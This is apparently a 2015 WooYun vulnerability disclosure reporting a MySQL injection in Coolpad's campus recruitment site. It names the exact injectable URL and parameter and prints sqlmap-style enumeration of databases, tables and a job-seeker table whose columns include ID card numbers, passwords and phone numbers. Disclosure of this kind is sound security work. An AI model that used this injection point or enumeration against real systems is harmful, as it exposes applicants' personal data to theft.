当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134315

漏洞标题:手机行业安全之宇龙通信(酷派)MySQL注射(暴露用户简历)

相关厂商:yulong.com

漏洞作者: 路人甲

提交时间:2015-08-15 18:00

修复时间:2015-10-01 08:54

公开时间:2015-10-01 08:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

MySQL注射&XSS

详细说明:

http://campus.coolpad.com//index.php?c=schoolRecruitment&cate=internetBusy*&f=jobPosition


参数cate可注射!

1.jpg


2.jpg


3.jpg


available databases [3]:
[*] coolpadjobdb
[*] information_schema
[*] test


Database: coolpadjobdb
[35 tables]
+---------------------------------+
| clp_college                     |
| clp_college_department          |
| clp_count_position              |
| clp_department                  |
| clp_department_managers         |
| clp_hiring                      |
| clp_hiring_employ               |
| clp_hiring_first                |
| clp_hiring_second               |
| clp_lecture                     |
| clp_managers                    |
| clp_managers_area               |
| clp_position                    |
| clp_position_city               |
| clp_position_interviewarea      |
| clp_position_type               |
| clp_position_workarea           |
| clp_preach_plan                 |
| clp_province                    |
| clp_ranks                       |
| clp_recruit_area                |
| clp_recruitment_dynamics        |
| clp_seekers                     |
| clp_seekers_active              |
| clp_seekers_audition            |
| clp_seekers_behave              |
| clp_seekers_connection          |
| clp_seekers_education           |
| clp_seekers_family_relationship |
| clp_seekers_practice_experience |
| clp_seekers_project_experience  |
| clp_seekers_self_evaluation     |
| clp_seekers_skills_hobbies      |
| statistics_datas                |
| statistics_status               |
+---------------------------------+


Database: coolpadjobdb
Table: clp_seekers
[38 columns]
+----------------------------+--------------------------------------------------
----------------------+
| Column                     | Type
                      |
+----------------------------+--------------------------------------------------
----------------------+
| coolyun_uid                | int(9)
                      |
| s_address                  | varchar(420)
                      |
| s_before_colloge_residence | varchar(45)
                      |
| s_birthday                 | timestamp
                      |
| s_card_type                | enum('idcard','other')
                      |
| s_edit_date                | datetime
                      |
| s_email                    | varchar(24)
                      |
| s_emergency_contact        | varchar(72)
                      |
| s_emergency_contact_tel    | varchar(18)
                      |
| s_emergency_number         | varchar(42)
                      |
| s_eng_rank_goal            | varchar(12)
                      |
| s_eng_rank_type            | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4',
'TEM8','BEC','CATTI') |
| s_expect_graduation        | timestamp
                      |
| s_graduation_time          | datetime
                      |
| s_health                   | enum('better','nice','bad')
                      |
| s_height                   | int(4)
                      |
| s_iconb                    | varchar(420)
                      |
| s_icons                    | varchar(420)
                      |
| s_id                       | int(8)
                      |
| s_idcard                   | varchar(20)
                      |
| s_living_city              | varchar(45)
                      |
| s_marital_status           | enum('married','unmarried','divorce','secret')
                      |
| s_name                     | varchar(72)
                      |
| s_nation                   | varchar(32)
                      |
| s_origin_palce             | varchar(128)
                      |
| s_other_eng_rank_goal      | varchar(12)
                      |
| s_other_eng_rank_type      | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4',
'TEM8','BEC','CATTI') |
| s_other_lang_rank          | varchar(300)
                      |
| s_password                 | varchar(32)
                      |
| s_photo                    | varchar(300)
                      |
| s_political_status         | enum('members','party','other')
                      |
| s_portrait                 | varchar(360)
                      |
| s_realname                 | varchar(24)
                      |
| s_save_date                | datetime
                      |
| s_sex                      | enum('lady','gentleman')
                      |
| s_tel                      | varchar(18)
                      |
| s_wechat                   | varchar(24)
                      |
| s_weight                   | int(4)
                      |
+----------------------------+--------------------------------------------------
----------------------+


不看数据

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-17 08:52

厂商回复:

感谢提供,我们尽快处理

最新状态:

暂无